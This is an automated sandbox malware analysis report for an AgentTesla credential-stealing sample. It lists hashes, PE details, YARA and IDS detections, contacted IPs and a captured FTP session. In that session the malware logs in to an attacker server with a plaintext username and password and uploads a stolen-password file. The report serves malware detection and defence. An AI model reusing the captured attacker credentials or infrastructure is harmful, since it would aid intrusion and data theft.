                    http://www.galapagosdesign.com/staff/dennis.htmSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/frere-user.htmlSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers8SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.comSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sandoll.co.krSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1783809425.0000000003031000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sakkal.comSecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, 00000000.00000002.1788730235.0000000007A52000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    108.179.234.136
                    		wapination.netUnited States
                    		46606UNIFIEDLAYER-AS-1UStrue

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1459875
                    Start date and time:2024-06-20 07:23:12 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 31s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/1@1/1
                    EGA Information:
                    • Successful, ratio: 50%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 142
                    • Number of non-executed functions: 11
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe, PID 7128 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    01:24:13API Interceptor8x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    108.179.234.136Shipping Documents_pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                      Quotation_#432768#_pdf.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                        Payment Advice Copy-EUR 5500,00 20240419165413-docx.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                          Payment_Advice-pdf.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            UNIFIEDLAYER-AS-1UShttps://otn.yfm.mybluehost.me/DEGER/Get hashmaliciousHTMLPhisherBrowse
                            • 50.87.228.40
                            http://click.promote.weebly.com/ls/click?upn=u001.j4J8mTsZ9n-2BXC3bkpEGuz50lGHlGvT3cLvbLRz27U7nbCy34PZfKldvZdQOxbYfQdpIO_ubnWW9PtOQz4ZIQW6byamRrJvV5j5QxMrQNeuvOlUwUwzU3n7afK0DT02-2Fh-2FEn9XQfE8APy5dcMY7okiMp6dn50YqTbWhwGv3QOuBDJ8By3TyASAIn3f2BeroENda7C-2Bh-2FrggWUDbq1OQU0iatMdz9T8bavQMqv-2FLL82Npkt-2FIYVNbpHq9Lcjy0FdNvuGsRZBL7ecWgydm46XJJa1wVRMTOXteK65K54Kr77vFfheTxVJYv2E8w-2B-2B1PVXj-2BtfuBn6giqM-2BrM-2FU61gbtNM1DlWLB5XHsVf7zrgHgzoU6kXBL4eU-2BkyxXXRasTbCCo1dj-2BUUHPOVM-2Fwx5w21DPnZBOlPgxyxHi4jDX1qhrEQ78CzgyGNwQZdsmAxFRaEEiJyZyTtySZibbaRCzWjvrWyDXH5YKeHfRMiRfJza-2BT3dvDBMLJnd2JeDwihpfsRj-2BRpKPerWH9cGrZtMGU7RwaTFiYJCYZjFzK8gYF3W6VV-2FJIhQ-3D#2298789727398466500609:53:58%20PM06/18/2024%2009:53:58%20PM9fjkqicho4gezabpl2us1nvy0tx58m3wGet hashmaliciousHTMLPhisherBrowse
                            • 50.87.228.40
                            Transaction Notification.exeGet hashmaliciousAgentTeslaBrowse
                            • 173.254.28.210
                            Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                            • 162.241.253.174
                            https://imoveisjsguimaraes.com.br/73/#akern@jerrypair.comGet hashmaliciousUnknownBrowse
                            • 192.185.211.87
                            shipping_doc.bat.exeGet hashmaliciousFormBookBrowse
                            • 108.179.193.98
                            https://luxsci-email.com/_LjLMz6YfdF3SADayiSEZ_/email-link/168507/2153/send-me?to=https://service.ringcentral.com@aerosupportfbo.com/access/auth/eups/cGVnZ3kud2VnbmVyQGNhYmluZXR3b3Jrc2dyb3VwLmNvbQ==Get hashmaliciousUnknownBrowse
                            • 50.87.153.94
                            UNCR76301078976375.wsfGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 192.185.13.234
                            BID DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                            • 192.185.113.233
                            NEW PO#101.exeGet hashmaliciousAgentTeslaBrowse
                            • 50.87.218.140

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe.log

                            Download File
                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):1301
                            Entropy (8bit):5.334025345208678
                            Encrypted:false
                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                            MD5:C8D49A85A61847AAE0536AE8856F6DEC
                            SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                            SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                            SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                            Malicious:true
                            Reputation:moderate, very likely benign file
                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):7.92808851494674
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            • Win32 Executable (generic) a (10002005/4) 49.78%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            • DOS Executable Generic (2002/1) 0.01%
                            File name:SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            File size:643'584 bytes
                            MD5:64073b255ae31ff074cb796d8863bce3
                            SHA1:98a21169f0ea27a70b0a456b0d3e9bf3fe018014
                            SHA256:1b42d958ccd31edd5a5839eaa6744c3d07d3708dcbc38f4b683d89e1f85dde2c
                            SHA512:02c738bc4f7afcfe776bfa437beeb38278ef316910e2f6154f403a5a04d2c254d7bab930a0231e2be9361e5119ffe6686791986c91bf176c254559b62fa8f32c
                            SSDEEP:12288:nz9wThptgAsZMuwGytdr5wHLEdE5uWNgPxheTQr3N/13yTwP:bNZWGyXmrEdwNvYU
                            TLSH:4ED41205F7FB9F16C72E7BF29962886047F7606B9130E70B0EC6A8DD1E217948950B93
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....sf................................. ........@.. .......................@............@................................

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0x49e79e
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66738295 [Thu Jun 20 01:15:01 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x9e7500x4b.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x600.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x9c7a40x9c80038f0ae117e856aade6f8d4dd72a0546eFalse0.9529190794728435data7.935386326287815IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xa00000x6000x600e01c8611ab0c4860e51fd6cc65b4e0e9False0.4329427083333333data4.12172404707844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xa20000xc0x20092c733eedeb099de1abaf0c24daaa978False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0xa00900x32cdata0.4445812807881773
                            RT_MANIFEST0xa03cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            06/20/24-07:24:18.598870TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil4973747602192.168.2.4108.179.234.136
                            06/20/24-07:24:18.182738TCP2029927ET TROJAN AgentTesla Exfil via FTP4973521192.168.2.4108.179.234.136
                            06/20/24-07:24:18.598870TCP2855542ETPRO TROJAN Agent Tesla CnC Exfil Activity4973747602192.168.2.4108.179.234.136

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jun 20, 2024 07:24:16.853229046 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:16.859935999 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:16.860179901 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:17.393280029 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.393634081 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:17.401550055 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.510782957 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.511066914 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:17.517100096 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.709440947 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.709722996 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:17.714636087 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.825558901 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.825774908 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:17.831562042 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.942966938 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:17.943233967 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:17.948379993 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.059371948 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.059747934 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.065130949 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.175935030 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.176647902 CEST4973747602192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.181598902 CEST4760249737108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.182234049 CEST4973747602192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.182738066 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.189167023 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.598625898 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.598870039 CEST4973747602192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.598936081 CEST4973747602192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.603878021 CEST4760249737108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.604209900 CEST4760249737108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.604257107 CEST4973747602192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.643718958 CEST4973521192.168.2.4108.179.234.136
                            Jun 20, 2024 07:24:18.739942074 CEST2149735108.179.234.136192.168.2.4
                            Jun 20, 2024 07:24:18.784337997 CEST4973521192.168.2.4108.179.234.136

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jun 20, 2024 07:24:16.528513908 CEST5368253192.168.2.41.1.1.1
                            Jun 20, 2024 07:24:16.847151041 CEST53536821.1.1.1192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jun 20, 2024 07:24:16.528513908 CEST192.168.2.41.1.1.10x8609Standard query (0)ftp.wapination.netA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jun 20, 2024 07:24:16.847151041 CEST1.1.1.1192.168.2.40x8609No error (0)ftp.wapination.netwapination.netCNAME (Canonical name)IN (0x0001)false
                            Jun 20, 2024 07:24:16.847151041 CEST1.1.1.1192.168.2.40x8609No error (0)wapination.net108.179.234.136A (IP address)IN (0x0001)false

                            FTP Packets

                            TimestampSource PortDest PortSource IPDest IPCommands
                            Jun 20, 2024 07:24:17.393280029 CEST2149735108.179.234.136192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 00:24. Server port: 21.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 00:24. Server port: 21.220-IPv6 connections are also welcome on this server.
                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 6 of 150 allowed.220-Local time is now 00:24. Server port: 21.220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                            Jun 20, 2024 07:24:17.393634081 CEST4973521192.168.2.4108.179.234.136USER pop@wapination.net
                            Jun 20, 2024 07:24:17.510782957 CEST2149735108.179.234.136192.168.2.4331 User pop@wapination.net OK. Password required
                            Jun 20, 2024 07:24:17.511066914 CEST4973521192.168.2.4108.179.234.136PASS sync@#1235
                            Jun 20, 2024 07:24:17.709440947 CEST2149735108.179.234.136192.168.2.4230 OK. Current restricted directory is /
                            Jun 20, 2024 07:24:17.825558901 CEST2149735108.179.234.136192.168.2.4504 Unknown command
                            Jun 20, 2024 07:24:17.825774908 CEST4973521192.168.2.4108.179.234.136PWD
                            Jun 20, 2024 07:24:17.942966938 CEST2149735108.179.234.136192.168.2.4257 "/" is your current location
                            Jun 20, 2024 07:24:17.943233967 CEST4973521192.168.2.4108.179.234.136TYPE I
                            Jun 20, 2024 07:24:18.059371948 CEST2149735108.179.234.136192.168.2.4200 TYPE is now 8-bit binary
                            Jun 20, 2024 07:24:18.059747934 CEST4973521192.168.2.4108.179.234.136PASV
                            Jun 20, 2024 07:24:18.175935030 CEST2149735108.179.234.136192.168.2.4227 Entering Passive Mode (108,179,234,136,185,242)
                            Jun 20, 2024 07:24:18.182738066 CEST4973521192.168.2.4108.179.234.136STOR PW_user-887849_2024_06_20_01_24_15.html
                            Jun 20, 2024 07:24:18.598625898 CEST2149735108.179.234.136192.168.2.4150 Accepted data connection
                            Jun 20, 2024 07:24:18.739942074 CEST2149735108.179.234.136192.168.2.4226-File successfully transferred
                            226-File successfully transferred226 0.117 seconds (measured here), 2.67 Kbytes per second

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Target ID:0
                            Start time:01:24:09
                            Start date:20/06/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                            Imagebase:0xc20000
                            File size:643'584 bytes
                            MD5 hash:64073B255AE31FF074CB796D8863BCE3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1784260103.000000000405D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            General

                            Target ID:2
                            Start time:01:24:14
                            Start date:20/06/2024
                            Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.12152.17697.exe"
                            Imagebase:0xd60000
                            File size:643'584 bytes
                            MD5 hash:64073B255AE31FF074CB796D8863BCE3
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2985192708.00000000031CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2982742539.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2985192708.0000000003181000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:false

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:10.2%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:250
                              Total number of Limit Nodes:13
                              execution_graph 32588 81295f0 32589 812977b 32588->32589 32590 8129616 32588->32590 32590->32589 32592 8120420 32590->32592 32593 8129c78 PostMessageW 32592->32593 32594 8129ce4 32593->32594 32594->32590 32456 133d560 32457 133d5a6 32456->32457 32461 133d730 32457->32461 32465 133d740 32457->32465 32458 133d693 32462 133d740 32461->32462 32468 133d338 32462->32468 32466 133d338 DuplicateHandle 32465->32466 32467 133d76e 32466->32467 32467->32458 32469 133d7a8 DuplicateHandle 32468->32469 32470 133d76e 32469->32470 32470->32458 32471 13347a8 32472 13347c8 32471->32472 32473 13348df 32472->32473 32476 1334883 32472->32476 32478 13349c9 32472->32478 32483 13344cc 32473->32483 32475 13348fa 32479 13349ed 32478->32479 32487 1334ed1 32479->32487 32491 1334ee0 32479->32491 32484 13344d7 32483->32484 32499 1335d74 32484->32499 32486 133720d 32486->32475 32489 1334f07 32487->32489 32488 1334fe4 32488->32488 32489->32488 32495 1334b3c 32489->32495 32492 1334f07 32491->32492 32493 1334b3c CreateActCtxA 32492->32493 32494 1334fe4 32492->32494 32493->32494 32496 1335f70 CreateActCtxA 32495->32496 32498 1336033 32496->32498 32498->32498 32500 1335d7f 32499->32500 32503 1335d94 32500->32503 32502 13376b5 32502->32486 32504 1335d9f 32503->32504 32507 133722c 32504->32507 32506 133779a 32506->32502 32508 1337237 32507->32508 32511 133725c 32508->32511 32510 133788d 32510->32506 32512 1337267 32511->32512 32514 1338af3 32512->32514 32518 133ad98 32512->32518 32513 1338b31 32513->32510 32514->32513 32523 133ce90 32514->32523 32529 133ce80 32514->32529 32535 133b148 32518->32535 32539 133b1c8 32518->32539 32543 133b1d8 32518->32543 32519 133adae 32519->32514 32524 133ceb1 32523->32524 32525 133ced5 32524->32525 32567 133d448 32524->32567 32571 133d438 32524->32571 32575 133d4a0 32524->32575 32525->32513 32530 133ce87 32529->32530 32531 133ced5 32530->32531 32532 133d4a0 2 API calls 32530->32532 32533 133d438 2 API calls 32530->32533 32534 133d448 2 API calls 32530->32534 32531->32513 32532->32531 32533->32531 32534->32531 32536 133b14d 32535->32536 32547 133b2bf 